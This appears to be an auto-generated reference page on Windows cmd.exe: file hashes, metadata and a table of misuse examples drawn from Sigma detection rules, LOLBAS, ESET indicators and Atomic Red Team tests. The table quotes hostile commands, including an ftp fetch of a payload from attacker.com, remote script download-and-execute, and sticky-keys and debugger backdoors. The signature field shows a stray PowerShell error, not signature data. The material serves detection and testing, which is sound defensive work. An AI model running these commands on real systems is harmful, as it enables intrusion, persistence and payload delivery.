cmd.exe
- File Path:
C:\windows\system32\cmd.exe - Description: Windows Command Processor
Hashes
| Type | Hash |
|---|---|
| MD5 | F5AE03DE0AD60F5B17B82F2CD68402FE |
| SHA1 | 7C3D7281E1151FE4127923F4B4C3CD36438E1A12 |
| SHA256 | 6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B |
| SHA384 | FC062C55DF4453425B376F5AD7DC9E78660296BDEC082A4B658F4E0F6B3B7EE7177926F14F7AC175AC844830F6020044 |
| SHA512 | 28D08D1BF10BCD5FC4C6168189DC63CA0E340B9A254FFB200737E6C0ED7E2175FC0AF28406287F2FC9015B2E00294A1FE4C48B5493720DCEBC443B9A5D42CEE2 |
| SSDEEP | 6144:Tuknw6IdOrtDbUngzrlzMA32rOZT+zDwSMm:KaHIArtDbUngzBMA3GOZSzDwL |
Signature
- Status: The file C:\windows\system32\cmd.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
- Serial: ``
- Thumbprint: ``
- Issuer:
- Subject:
File Metadata
- Original Filename: Cmd.Exe.MUI
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
- Product Version: 6.3.9600.16384
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
Possible Misuse
The following table contains possible examples of cmd.exe being misused. While cmd.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | net_susp_dns_txt_exec_strings.yml | - 'cmd.exe' |
DRL 1.0 |
| sigma | win_asr_bypass_via_appvlp_re.yml | CommandLine\|re: '(?i).*appvlp.exe.*(cmd.exe\|powershell.exe).*(.sh\|.exe\|.dll\|.bin\|.bat\|.cmd\|.js\|.msh\|.reg\|.scr\|.ps\|.vb\|.jar\|.pl\|.inf)' |
DRL 1.0 |
| sigma | win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml | # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a |
DRL 1.0 |
| sigma | win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml | - 'cmd.exe' |
DRL 1.0 |
| sigma | win_susp_logon_explicit_credentials.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a |
DRL 1.0 |
| sigma | win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | - 'cmd.exe' |
DRL 1.0 |
| sigma | win_susp_rclone_exec.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a |
DRL 1.0 |
| sigma | driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml | - 'cmd.exe' |
DRL 1.0 |
| sigma | file_delete_win_delete_backup_file.yml | Image\|endswith: cmd.exe |
DRL 1.0 |
| sigma | file_event_win_macro_file.yml | - \cmd.exe |
DRL 1.0 |
| sigma | file_event_win_susp_desktop_txt.yml | Image\|endswith: \cmd.exe |
DRL 1.0 |
| sigma | file_event_win_susp_ntds_dit.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | file_event_win_win_shell_write_susp_directory.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_abusing_debug_privilege.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_babyshark.yml | - cmd.exe /c taskkill /im cmd.exe |
DRL 1.0 |
| sigma | proc_creation_win_apt_elise.yml | Image: 'C:\Windows\SysWOW64\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_greenbug_may20.yml | - '8989 -e cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_greenbug_may20.yml | - 'CSIDL_SYSTEM\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_apt_lazarus_loader.yml | - 'cmd.exe /c ' |
DRL 1.0 |
| sigma | proc_creation_win_apt_unc2452_cmds.yml | CommandLine\|contains: 'cmd.exe /C ' |
DRL 1.0 |
| sigma | proc_creation_win_attrib_hiding_files.yml | ParentImage\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_attrib_hiding_files.yml | - igfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) |
DRL 1.0 |
| sigma | proc_creation_win_cmd_redirect.yml | Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_cobaltstrike_process_patterns.yml | CommandLine\|contains: '\cmd.exe /C whoami' |
DRL 1.0 |
| sigma | proc_creation_win_cobaltstrike_process_patterns.yml | - 'cmd.exe /C echo' |
DRL 1.0 |
| sigma | proc_creation_win_cobaltstrike_process_patterns.yml | - 'cmd.exe /c echo' |
DRL 1.0 |
| sigma | proc_creation_win_cobaltstrike_process_patterns.yml | Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_commandline_path_traversal.yml | title: Cmd.exe CommandLine Path Traversal |
DRL 1.0 |
| sigma | proc_creation_win_commandline_path_traversal.yml | description: detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking |
DRL 1.0 |
| sigma | proc_creation_win_commandline_path_traversal.yml | - https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/ |
DRL 1.0 |
| sigma | proc_creation_win_embed_exe_lnk.yml | Image: C:\Windows\System32\cmd.exe |
DRL 1.0 |
| sigma | proc_creation_win_exploit_cve_2019_1378.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_exploit_cve_2020_10189.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_exploit_lpe_cve_2021_41379.yml | description: Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights |
DRL 1.0 |
| sigma | proc_creation_win_exploit_lpe_cve_2021_41379.yml | Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_hack_koadic.yml | Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_html_help_spawn.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_impacket_lateralization.yml | # cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 |
DRL 1.0 |
| sigma | proc_creation_win_impacket_lateralization.yml | # cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 |
DRL 1.0 |
| sigma | proc_creation_win_impacket_lateralization.yml | # "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567442499.05 2>&1 |
DRL 1.0 |
| sigma | proc_creation_win_impacket_lateralization.yml | # "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1567520103.71 2>&1 |
DRL 1.0 |
| sigma | proc_creation_win_impacket_lateralization.yml | # C:\Windows\system32\cmd.exe /Q /c echo tasklist ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat |
DRL 1.0 |
| sigma | proc_creation_win_impacket_lateralization.yml | - 'cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_impacket_lateralization.yml | # cmd.exe /C tasklist /m > C:\Windows\Temp\bAJrYQtL.tmp 2>&1 |
DRL 1.0 |
| sigma | proc_creation_win_local_system_owner_account_discovery.yml | - Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_local_system_owner_account_discovery.yml | - ' rmdir ' # don't match on 'dir' "C:\Windows\System32\cmd.exe" /q /c rmdir /s /q "C:\Users\XX\AppData\Local\Microsoft\OneDrive\19.232.1124.0005" |
DRL 1.0 |
| sigma | proc_creation_win_malware_trickbot_recon_activity.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_mal_blue_mockingbird.yml | Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml | # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a |
DRL 1.0 |
| sigma | proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml | - 'cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_mmc_spawn_shell.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_monitoring_for_persistence_via_bits.yml | CommandLine\|re: '(?i).*bitsadmin.*\/SetNotifyCmdLine.*(%COMSPEC%\|cmd.exe\|regsvr32.exe).*' |
DRL 1.0 |
| sigma | proc_creation_win_mshta_spawn_shell.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_netcat_execution.yml | - ' --exec cmd.exe ' |
DRL 1.0 |
| sigma | proc_creation_win_office_shell.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_public_folder_parent.yml | - 'cmd.exe /c ' |
DRL 1.0 |
| sigma | proc_creation_win_redirect_to_stream.yml | Image\|endswith: \cmd.exe |
DRL 1.0 |
| sigma | proc_creation_win_redmimicry_winnti_proc.yml | - cmd.exe |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - 'cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_screenconnect_anomaly.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_by_java.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_mshta.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_susp_program.yml | # - '*\cmd.exe' # too many false positives |
DRL 1.0 |
| sigma | proc_creation_win_stickykey_like_backdoor.yml | Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml | CommandLine: 'copy /y C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_cmd_http_appdata.yml | Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_copy_lateral_movement.yml | Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_copy_system32.yml | - 'cmd.exe*/c*copy*\System32\' |
DRL 1.0 |
| sigma | proc_creation_win_susp_copy_system32.yml | - False positive when cmd.exe and xcopy.exe are called directly # C:\Windows\System32\cmd.exe /c copy file1 file2 |
DRL 1.0 |
| sigma | proc_creation_win_susp_crackmapexec_execution.yml | - 'cmd.exe /Q /c * 1> \\\\*\\*\\* 2>&1' |
DRL 1.0 |
| sigma | proc_creation_win_susp_crackmapexec_execution.yml | - 'cmd.exe /C * > \\\\*\\*\\* 2>&1' |
DRL 1.0 |
| sigma | proc_creation_win_susp_crackmapexec_execution.yml | - 'cmd.exe /C * > *\\Temp\\* 2>&1' |
DRL 1.0 |
| sigma | proc_creation_win_susp_del.yml | #cmd.exe (PID: 1044 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im A8D4.exe /f & timeout /t 6 & del /f /q 'C:\Users\user~1\AppData\Local\Temp\A8D4.exe' & del C:\ProgramData\*.dll & exit |
DRL 1.0 |
| sigma | proc_creation_win_susp_explorer.yml | - \cmd.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_explorer.yml | - Legitimate explorer.exe run from cmd.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_explorer_break_proctree.yml | description: Detects a command line process that uses explorer.exe /root, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer |
DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_pester.yml | Image\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_psexex_paexec_escalate_system.yml | CommandLine\|endswith: ' -s cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_psexex_paexec_flags.yml | - ' -s cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_psexex_paexec_flags.yml | - ' -s -i cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_rclone_execution.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_anomalies.yml | ParentImage\|endswith: '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_schtasks_pattern.yml | - 'cmd.exe /c ' |
DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_env_folder.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_env_folder.yml | - 'cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_from_mssql.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_from_mssql.yml | Image: 'C:\Windows\System32\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_from_mssql.yml | CommandLine\|startswith: '"C:\Windows\system32\cmd.exe" ' |
DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_from_winrm.yml | - '*\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_spoolsv_child_processes.yml | Image\|endswith: \cmd.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_whoami_anomaly.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_uac_bypass_wmp.yml | Image: 'C:\Windows\System32\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_using_settingsynchost_as_lolbin.yml | - 'cmd.exe /c' |
DRL 1.0 |
| sigma | proc_creation_win_vmtoolsd_susp_child_process.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_webshell_recon_detection.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | proc_creation_win_webshell_spawn.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | registry_event_asep_reg_keys_modification_currentversion.yml | Details\|startswith: 'C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\' |
DRL 1.0 |
| sigma | sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml | - '\cmd.exe' |
DRL 1.0 |
| sigma | collection_repeat.yml | CommandLine: cmd.exe |
DRL 1.0 |
| LOLBAS | Bitsadmin.yml | - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 |
|
| LOLBAS | Bitsadmin.yml | Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. |
|
| LOLBAS | Bitsadmin.yml | Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. |
|
| LOLBAS | Bitsadmin.yml | - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset |
|
| LOLBAS | Bitsadmin.yml | Description: Command for copying cmd.exe to another folder |
|
| LOLBAS | Bitsadmin.yml | - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset |
|
| LOLBAS | Bitsadmin.yml | Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. |
|
| LOLBAS | Cmd.yml | Name: Cmd.exe |
|
| LOLBAS | Cmd.yml | - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat |
|
| LOLBAS | Cmd.yml | - Command: cmd.exe - < fakefile.doc:payload.bat |
|
| LOLBAS | Cmd.yml | - Path: C:\Windows\System32\cmd.exe |
|
| LOLBAS | Cmd.yml | - Path: C:\Windows\SysWOW64\cmd.exe |
|
| LOLBAS | Cmd.yml | - IOC: cmd.exe executing files from alternate data streams. |
|
| LOLBAS | Cmd.yml | - IOC: cmd.exe creating/modifying file contents in an alternate data stream. |
|
| LOLBAS | Ftp.yml | - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" |
|
| LOLBAS | Sc.yml | - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice |
|
| LOLBAS | Sc.yml | - Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing> |
|
| LOLBAS | Wmic.yml | - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" |
|
| LOLBAS | Wmic.yml | Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. |
|
| LOLBAS | Advpack.yml | - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS | Ieadvpack.yml | - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
| LOLBAS | Shell32.yml | - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" |
|
| LOLBAS | Winrm.yml | - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' |
|
| LOLBAS | Mftrace.yml | - Command: Mftrace.exe cmd.exe |
|
| LOLBAS | Mftrace.yml | Description: Launch cmd.exe as a subprocess of Mftrace.exe. |
|
| LOLBAS | Mftrace.yml | Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe. |
|
| malware-ioc | badiis.yar | $s1 = "cmd.exe" ascii wide |
© ESET 2014-2018 |
| malware-ioc | badiis.yar | $s4 = "cmd.exe" |
© ESET 2014-2018 |
| malware-ioc | badiis.yar | $s5 = "cmd.exe" |
© ESET 2014-2018 |
| malware-ioc | badiis.yar | $s4 = "\\cmd.exe" nocase |
© ESET 2014-2018 |
| malware-ioc | win_apt_invisimole_wdigest_chain.yml | CommandLine\|contains: 'rundll32.exe Shell32.dll ShellExec_RunDLL cmd.exe /c mkdir SMRTNTKY\MessageB.txt' |
© ESET 2014-2018 |
| malware-ioc | nukesped_lazarus | ==== cmd.exe /c "%s 2>> %s" |
© ESET 2014-2018 |
| malware-ioc | nukesped_lazarus | ==== cmd.exe /c "%s >> %s 2>&1" |
© ESET 2014-2018 |
| malware-ioc | nukesped_lazarus | ==== cmd.exe /c "%s" > %s 2>&1 |
© ESET 2014-2018 |
| malware-ioc | nukesped_lazarus | ==== cmd.exe /c "" > 2>&1 (on stack) |
© ESET 2014-2018 |
| malware-ioc | nukesped_lazarus | ==== cmd.exe /c %s >> %s 2>&1 |
© ESET 2014-2018 |
| atomic-red-team | index.md | - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.003.md | wmic /node:”#{target_host}” process call create “cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1007.md | Upon successful execution, cmd.exe will execute service commands with expected result to stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1007.md | Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s | MIT License. © 2018 Red Canary |
| atomic-red-team | T1010.md | Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1012.md | Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). | MIT License. © 2018 Red Canary |
| atomic-red-team | T1016.md | Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1016.md | Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1016.md | Upon successful execution, cmd.exe will spawn ipconfig /all, net config workstation, net view /all /domain, nltest /domain_trusts. Output will be via stdout. |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1018.md | Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled. |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1018.md | Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the “Domain Computers” group. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1018.md | Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1018.md | Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1018.md | Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1018.md | Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1018.md | foreach ($ip in 1..255 | % { “$firstOctet.$secondOctet.$thirdOctet.$_” } ) {cmd.exe /c nslookup $ip} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1021.002.md | cmd.exe /c “net use \#{computer_name}#{share_name} #{password} /u:#{user_name}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1021.002.md | | command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1021.002.md | cmd.exe /Q /c #{command_to_execute} 1> \127.0.0.1\ADMIN$#{output_file} 2>&1 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1027.004.md | | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1033.md | Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1033.md | cmd.exe /C whoami | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.md | copy %WINDIR%\System32\cmd.exe /Y %ALLUSERSPROFILE%\cmd.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.md | start %ALLUSERSPROFILE%\cmd.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.md | del %ALLUSERSPROFILE%\cmd.exe >nul 2>&1 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | cmd.exe /c %APPDATA%\notepad.exe /B | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | cmd.exe /c %APPDATA%\svchost.exe /B | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | cmd.exe /K %APPDATA%\taskhostw.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | copy C:\Windows\System32\cmd.exe C:\lsm.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1049.md | Upon successful execution, cmd.exe will execute netstat, net use and net sessions. Results will output via stdout. |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1049.md | Upon successful execution, cmd.exe will execute sharpview.exe |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.002.md | Executes cmd.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.002.md | Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | schtasks /create /tn “T1053_005_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | schtasks /create /tn “T1053_005_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.004.md | Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | String | C:\Windows\System32\cmd.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1057.md | Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | Powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1’); Invoke-AppPathBypass -Payload ‘C:\Windows\System32\cmd.exe’” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | C:\Windows\system32\cmd.exe /c “mshta.exe javascript:a=GetObject(‘script:#{url}’).Exec();close()” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1070.004.md | Delete a single file from the temporary directory using cmd.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1070.004.md | Recursively delete a folder in the temporary directory using cmd.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1083.md | - Atomic Test #1 - File and Directory Discovery (cmd.exe) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1083.md | ## Atomic Test #1 - File and Directory Discovery (cmd.exe) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | Upon successful execution, this will rename cmd.exe as svchost.exe and move it to c:\, then execute svchost.exe with output to a txt file. |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | copy C:\Windows\System32\cmd.exe C:\svchost.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1110.002.md | Start-Process cmd.exe -Args “/c %temp%\7z\7z.exe x %temp%\hashcat6.7z -aoa -o%temp%\hashcat-unzip” -Wait | MIT License. © 2018 Red Canary |
| atomic-red-team | T1112.md | cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f | MIT License. © 2018 Red Canary |
| atomic-red-team | T1112.md | cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f | MIT License. © 2018 Red Canary |
